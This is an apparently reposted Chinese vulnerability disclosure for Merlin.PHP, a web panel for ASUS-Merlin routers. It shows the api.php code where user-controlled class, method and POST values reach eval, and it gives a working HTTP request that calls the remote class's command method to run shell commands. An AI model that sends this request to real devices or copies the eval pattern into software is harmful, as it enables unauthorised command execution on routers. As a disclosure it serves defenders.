2. 程式人生 > >華碩路由器 Merlin.php 代碼執行漏洞

華碩路由器 Merlin.php 代碼執行漏洞

阿新 發佈:2018-10-12
pub none issue new net win pos fun form

Merlin.php

面向 ASUS﹣MERLIN 的 SS Web 管理面板。只支持 http://koolshare.io 下的固件版本。

github鏈接:https://github.com/qoli/Merlin.PHP

在api.php中使用了eval函數,其他幾個參數可控制導致任意代碼執行。
代碼如下:

<?php
set_include_path(get_include_path() . PATH_SEPARATOR . ‘library/phpseclib‘);
require_once ‘library/MainFunction.php‘;
require_once ‘Net/SSH2.php‘;
require_once ‘library/Requests.php‘;
require_once ‘library/AppFunction.php‘;
Requests::register_autoloader();

$merlin_php = new merlin_php();

if (!isset($_POST)) {
    $merlin_php -> _export("no input");
    exit;
}

$o = _GET("class",‘unknow‘);
$f = _GET(‘function‘,‘unknow‘);

if ($o == ‘unknow‘) {
    $merlin_php -> _export("no input");
    exit;
}

if ($f == ‘unknow‘) {
    $merlin_php -> _export("function?!");
    exit;
}

if (!class_exists($o)) {
    $merlin_php -> _export("class is none");
    exit;
}

$c = new $o();

$agrs = implode(‘,‘,$_POST);

// echo ‘$c->‘."$f($agrs);";

eval(‘$j = $c->‘."$f($agrs);");

echo json_encode($j);

最後能控制的是 eval(‘$j = $c->‘."$f($agrs);");

$j=是一個變量賦值不用管,主要是後面的 $c->$f($agrs); 這裏面的三個參數都可控。
$c是基於$o創建的;
$o是獲取的參數class值 ;

下面是關鍵代碼:

$c = new $o();
$o = _GET("class",‘unknow‘);
$f = _GET(‘function‘,‘unknow‘);
$agrs = implode(‘,‘,$_POST);

可以看出$o是一個對象,$c是$o對象的實例化,$f是對象的成員方法,$agrs是post傳入的參數,也就是成員方法的參數。

隨便找了一個類,AppFunction.php 中的 remote 類,看了下裏面有個執行命令的方法 command;

public function command($command = ‘whoami‘)
{
        return $this->ssh->exec($command);
}

構造下面請求:

POST /6/api.php?function=command&class=remote HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded

cc=‘ls‘

跟蹤執行流程,實際是執行了下面的代碼,導致任意代碼執行漏洞。

$c = new remote;
$j = $c->command(‘ls‘);

github issue:https://github.com/qoli/Merlin.PHP/issues/27

華碩路由器 Merlin.php 代碼執行漏洞

相關推薦

路由器 Merlin.php 執行漏洞

pub none issue new net win pos fun form Merlin.php 面向 ASUS﹣MERLIN 的 SS Web 管理面板。只支持 http://koolshare.io 下的固件版本。 github鏈接:https://github.c

路由器 Merlin.php 命令執行漏洞

定義 vpd lin 華碩 第一個 and popen函數 ffffff command Merlin.php 面向 ASUS﹣MERLIN 的 SS Web 管理面板。只支持 http://koolshare.io 下的固件版本。 github鏈接:https://git

php審計4審計執行漏洞

來替 開頭 fun 控制 amp google 正則 ble res 代碼執行漏洞代碼執行漏洞是指應用程序本身過濾不嚴,用戶可以通過請求將代碼註入到應用中執行,當應用在調用一些能將字符串轉化成代碼的函數(如php中的eval)時,沒有考慮到用戶是否能控制這個字符串,造成代碼

Jenkins遠程執行漏洞

查看 過程 com 漏洞 all 用戶 運行 最新 style 於一個月前,進行服務器巡檢時,發現服務器存在不明進程,並且以Jenkins用戶身份來運行.當時進行了處理並修復了漏洞.在此補上修復過程 第一反應是Jenkins存在漏洞,於是Google Jenkins漏洞,瞬

LNK文件(快捷方式)遠程執行漏洞復現過程(CVE-2017-8464)

abi cred starting compute appear pda info 等級 server 漏洞編號:CVE-2017-8464 漏洞等級:嚴重 漏洞概要:如果用戶打開攻擊者精心構造的惡意LNK文件,則會造成遠程代碼執行。成功利用此漏洞的攻擊者可以獲得與本地

http.sys遠程執行漏洞(MS15-034)

bsp 描述 style windows zh-cn port c代碼 win pan 0x01漏洞描述 遠程執行代碼漏洞存在於 HTTP 協議堆棧 (HTTP.sys) 中,當 HTTP.sys 未正確分析經特殊設計的 HTTP 請求時會導致此漏洞。成功利用此漏洞的攻擊者

Office遠程執行漏洞CVE-2017-0199復現

read 方式 觀察 data n3k -s 執行 rip 最大限度 在剛剛結束的BlackHat2017黑帽大會上,最佳客戶端安全漏洞獎頒給了CVE-2017-0199漏洞,這個漏洞是Office系列辦公軟件中的一個邏輯漏洞,和常規的內存破壞型漏洞不同,這

OrientDB遠程執行漏洞利用與分析

orientdb遠程代碼執行漏洞利用與分析原文見:http://zhuanlan.51cto.com/art/201708/548641.htm本文出自 “simeon技術專欄” 博客,請務必保留此出處http://simeon.blog.51cto.com/18680/1958277OrientDB遠程代碼

Microsoft Edge 瀏覽器遠程執行漏洞POC及細節(CVE-2017-8641)

ive buffer png serer virt pil binding nproc mil 2017年8月8日,CVE官網公布了CVE-2017-8641,在其網上的描述為: 意思是說,黑客可以通過在網頁中嵌入惡意構造的javascript代碼,使得微軟的瀏覽器(如E

Office CVE-2017-8570遠程執行漏洞復現

pytho pack root 一個 strong -o 激活 meta 相同 實驗環境 操作機:Kali Linux IP:172.16.11.2 目標機:windows7 x64 IP:172.16.12.2 實驗目的 掌握漏洞的利用方法 實驗

Apache ActiveMQ Fileserver遠程執行漏洞

.org tail 自己 run reader 一句話 遠程 ring 成功   掃端口的時候遇到8161端口,輸入admin/admin,成功登陸,之前就看到過相關文章,PUT了一句話上去,但是沒有什麽效果,於是本地搭建了一個環境,記錄一下測試過程。 環境搭建: Acti

Tomcat執行漏洞(CVE-2017-12615)的演繹及個人bypass

ros star quest odi -s 官方 argv 特性 ~~ 0x00 漏洞簡介 2017年9月19日,Apache Tomcat官方確認並修復了兩個高危漏洞。 漏洞CVE編號:CVE-2017-12615和CVE-2017-12616。 其中 遠程代碼執行漏洞(

Apache Tomcat CVE-2017-12615遠程執行漏洞分析

文件 only html ive zip pre clas one 判斷 2017年9月19日, Apache Tomcat官方發布兩個嚴重的安全漏洞, 其中CVE-2017-12615為遠程代碼執行漏洞,通過put請求向服務器上傳惡意jsp文件, 再通過jsp文件在服

Samba遠程執行漏洞(CVE-2017-7494)復現

one hub 4.6 修改配置 自己 tree bpa wid 找到   簡要記錄一下Samba遠程代碼執行漏洞(CVE-2017-7494)環境搭建和利用的過程,獻給那些想自己動手搭建環境的朋友。(雖然已過多時)   快捷通道:Docker ~ Samba遠程代碼

PHPMailer < 5.2.18 遠程執行漏洞(CVE-2016-10033)

com ifconf github cnblogs grep main src avi https PHPMailer < 5.2.18 Remote Code Execution    本文將簡單展示一下PHPMailer遠程代碼執行漏洞(CVE-2016-100

隱藏17年的Office遠程執行漏洞(CVE-2017-11882)

portal round splay avi uid windows 1.10 分享 ret Preface   這幾天關於Office的一個遠程代碼執行漏洞很流行,昨天也有朋友發了相關信息,於是想復現一下看看,復現過程也比較簡單,主要是簡單記錄下。   利用腳本Git

漏洞復現:Struts2 遠程執行漏洞(S2-033)

res 3par alt param amp lan post pull struts docker pull medicean/vulapps:s_struts2_s2-033 docker run -d -p 80:8080 medicean/vulapps:s_str

Office CVE-2017-8570 遠程執行漏洞復現

CVE-2017-8570 Office 遠程代碼執行 最近在學習kali的相關使用,朋友說不如就復現cve-2017-8570吧,我欣然答應。 0x00介紹CVE-2017-8570是一個邏輯漏洞,成因是Microsoft PowerPoint執行時會初始化“script”Moniker對象,

2. 執行漏洞

nsh set think mixed 生成文件 sse add PE .com 代碼執行 當應用在調用一些能將字符轉化為代碼的函數(如PHP中的eval)時, 沒有考慮用戶是否能控制這個字符串,這就會造成代碼執行漏洞。 相關函數 PHP:eval assert

struts2遠程執行漏洞匯總整理

lse pri sca cookie and 漏洞原理 ognl表達式 tac struts2配置 一、S2-001 1、漏洞原理 在默認配置下,如果用戶所提交的表單出現驗證錯誤,後端會對用戶的輸入進行解析處理,然後返回並顯示處理結果。 舉個例子,當你提交的登錄表單為use